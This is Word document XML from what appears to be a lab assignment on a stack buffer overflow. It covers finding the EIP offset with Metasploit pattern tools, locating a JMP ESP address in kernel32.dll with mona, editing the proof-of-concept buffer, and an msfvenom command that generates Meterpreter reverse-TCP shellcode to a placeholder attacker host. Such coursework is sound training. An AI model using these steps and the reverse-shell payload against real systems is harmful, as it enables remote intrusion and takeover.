            <wp:docPr id="57263929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639292" name="Picture 1" descr="A screen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434BF" w14:textId="458B5F96" w:rsidR="00D749E5" w:rsidRPr="00FC2E29" w:rsidRDefault="00D749E5" w:rsidP="00FC2E29">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>!mona</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:spacing w:val="-27"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:spacing w:val="-26"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>-s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:spacing w:val="-27"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>“\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>\xe4”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:spacing w:val="-27"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>-m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:spacing w:val="-27"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>kernel32.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FAF6EE" w14:textId="77777777" w:rsidR="00ED2BEA" w:rsidRDefault="00ED2BEA" w:rsidP="00FC2E29">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="169052D3" w14:textId="7056EE25" w:rsidR="00FC2E29" w:rsidRDefault="00FC2E29" w:rsidP="00FC2E29">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF3747">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Section </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Finding EIP Offset and Controlling EIP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4264B245" w14:textId="0BDA90E5" w:rsidR="00174691" w:rsidRDefault="00174691" w:rsidP="00174691">
      <w:r>
        <w:t xml:space="preserve">1. What </w:t>
      </w:r>
      <w:r>
        <w:t>command will create a unique pattern of 2220 bytes</w:t>
      </w:r>
      <w:r>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FF8C1D" w14:textId="77777777" w:rsidR="00D749E5" w:rsidRDefault="00D749E5" w:rsidP="00D749E5">
      <w:pPr>
        <w:ind w:left="79"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>cd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>-framework/tools/exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDFB85B" w14:textId="4C04DEF8" w:rsidR="00D749E5" w:rsidRPr="00D749E5" w:rsidRDefault="00D749E5" w:rsidP="00D749E5">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="79"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>pattern_create.rb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>-l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2220</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C17E519" w14:textId="0C1503A0" w:rsidR="00174691" w:rsidRDefault="00174691" w:rsidP="00174691">
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t>Where would you add the pattern to your Proof of Concept?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5412B5A6" w14:textId="705E6911" w:rsidR="00D749E5" w:rsidRDefault="00D749E5" w:rsidP="00174691">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70F1A71C" wp14:editId="01A4D9C8">
            <wp:extent cx="5667375" cy="3162300"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="16955634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56342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5448E" w14:textId="288D7B7C" w:rsidR="00D749E5" w:rsidRDefault="00D749E5" w:rsidP="00174691">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>Unique</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t xml:space="preserve"> pattern is inserted </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>after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rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>Get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:spacing w:val="-75"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>for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w w:val="105"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746128B3" w14:textId="77777777" w:rsidR="00D749E5" w:rsidRDefault="00174691" w:rsidP="00D749E5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4680"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. What </w:t>
      </w:r>
      <w:r>
        <w:t>pattern did you see in the EIP</w:t>
      </w:r>
      <w:r>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227BC66D" w14:textId="1C489712" w:rsidR="00F23115" w:rsidRDefault="00F23115" w:rsidP="00D749E5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4680"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27D85E9D" wp14:editId="32B2750B">
            <wp:extent cx="5629275" cy="3076575"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="173506150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061504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1BF1D" w14:textId="77777777" w:rsidR="00D749E5" w:rsidRPr="00D749E5" w:rsidRDefault="00D749E5" w:rsidP="00D749E5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4680"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00D749E5">
        <w:t>EIP address that was identified by the previous exploit test, the address is 0x36684335.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBCB65E" w14:textId="594CDA57" w:rsidR="00174691" w:rsidRDefault="00D749E5" w:rsidP="00D749E5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4680"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1F8851" w14:textId="116CA620" w:rsidR="00174691" w:rsidRDefault="00174691" w:rsidP="00174691">
      <w:r>
        <w:t>4. What command will you find the offset using the pattern from EIP?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49241137" w14:textId="7DC7D039" w:rsidR="00F23115" w:rsidRPr="00F23115" w:rsidRDefault="00F23115" w:rsidP="00F23115">
      <w:pPr>
        <w:ind w:left="79"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>opt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>-framework/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>embedded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>framework/tools/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>pattern_offset.rb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>-q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>36684335</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48530DEB" w14:textId="375DFB0A" w:rsidR="00174691" w:rsidRDefault="00174691" w:rsidP="00174691">
      <w:r>
        <w:t>5. What would you add to your Proof of Concept to test our new-found pattern?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DDD90B" w14:textId="77C22205" w:rsidR="00F23115" w:rsidRDefault="00F23115" w:rsidP="00174691">
      <w:r>
        <w:t>Buffer was updated to have:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE1415E" w14:textId="3571F037" w:rsidR="00F23115" w:rsidRDefault="00F23115" w:rsidP="00F23115">
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>1787 bytes of NOP data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48959348" w14:textId="5597A3C0" w:rsidR="00F23115" w:rsidRDefault="00F23115" w:rsidP="00F23115">
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>4 bytes of the character “A”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D400CB8" w14:textId="4ACDD600" w:rsidR="00F23115" w:rsidRDefault="00F23115" w:rsidP="00F23115">
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Additional buffer padding data after the EIP test data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54103D5A" w14:textId="0851F26C" w:rsidR="00F23115" w:rsidRDefault="00F23115" w:rsidP="00F23115">
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Additional buffer padding data to get the ESP address, and to keep the buffer consistently at 2200 bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABAEA98" w14:textId="30D1120D" w:rsidR="00174691" w:rsidRDefault="00174691" w:rsidP="00174691">
      <w:r>
        <w:t xml:space="preserve">6. What variable would you change in your </w:t>
      </w:r>
      <w:r w:rsidR="00F23115">
        <w:t>proof-of-concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> code to test we have placed our JMP ESP address into the EIP?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA6E8E6" w14:textId="2F221C70" w:rsidR="00E60626" w:rsidRDefault="00E60626" w:rsidP="00E60626">
      <w:r>
        <w:t>Old Line: buffer += “\x41\x41\x41\x41”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705F2352" w14:textId="61E1D12A" w:rsidR="00F23115" w:rsidRDefault="00E60626" w:rsidP="00E60626">
      <w:r>
        <w:t>New Line: buffer += “\x1d\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\xe4\x77”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8D4C69" w14:textId="52C3CCFC" w:rsidR="00E60626" w:rsidRDefault="00E60626" w:rsidP="00E60626">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C9BC24E" wp14:editId="3E79ED3F">
            <wp:extent cx="5676900" cy="2476500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="782190119" name="Picture 1" descr="A computer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190119" name="Picture 1" descr="A computer screen with colorful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86BD3" w14:textId="3F111F61" w:rsidR="00E60626" w:rsidRDefault="00E60626" w:rsidP="00E60626">
      <w:r>
        <w:t>Above screenshot displays</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that the EIP has been successfully manipulated to target the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AD4206" w14:textId="3F9D58B1" w:rsidR="00F23115" w:rsidRDefault="00E60626" w:rsidP="00E60626">
      <w:r>
        <w:t>kernel32.dll file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9362B4" w14:textId="77777777" w:rsidR="00E60626" w:rsidRDefault="00E60626" w:rsidP="00E60626"/>
    <w:p w14:paraId="41B7E242" w14:textId="77777777" w:rsidR="00CD5AC6" w:rsidRPr="00FC2E29" w:rsidRDefault="00CD5AC6" w:rsidP="00E60626"/>
    <w:p w14:paraId="39C61503" w14:textId="7EF07018" w:rsidR="00FC2E29" w:rsidRDefault="00FC2E29" w:rsidP="00FC2E29">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF3747">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Section </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Shellcode and Throwing the Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DA6A17" w14:textId="305D3E78" w:rsidR="00FC2E29" w:rsidRDefault="00174691" w:rsidP="00FC2E29">
      <w:r>
        <w:t xml:space="preserve">1. What command will create a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> reverse </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> shell identifying bad characters \x00\x0a\x0d?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065A6C88" w14:textId="166A7933" w:rsidR="00E60626" w:rsidRDefault="00E60626" w:rsidP="00E60626">
      <w:pPr>
        <w:ind w:left="79"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-framework/embedded/framework/tools/exploit$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>-p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>-b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>‘\x00\x0a\x0d’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56024963" w14:textId="77777777" w:rsidR="00E60626" w:rsidRDefault="00E60626" w:rsidP="00E60626">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="79"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>LHOST=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>IP.Addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>LPORT=443</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>-f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202E3188" w14:textId="77777777" w:rsidR="00E60626" w:rsidRDefault="00E60626" w:rsidP="00FC2E29"/>
    <w:p w14:paraId="1943F602" w14:textId="71B486BD" w:rsidR="00174691" w:rsidRDefault="00174691" w:rsidP="00FC2E29">
      <w:r>
        <w:t xml:space="preserve">2. What command would you use to access </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>?</w:t>
      </w:r>
    </w:p>
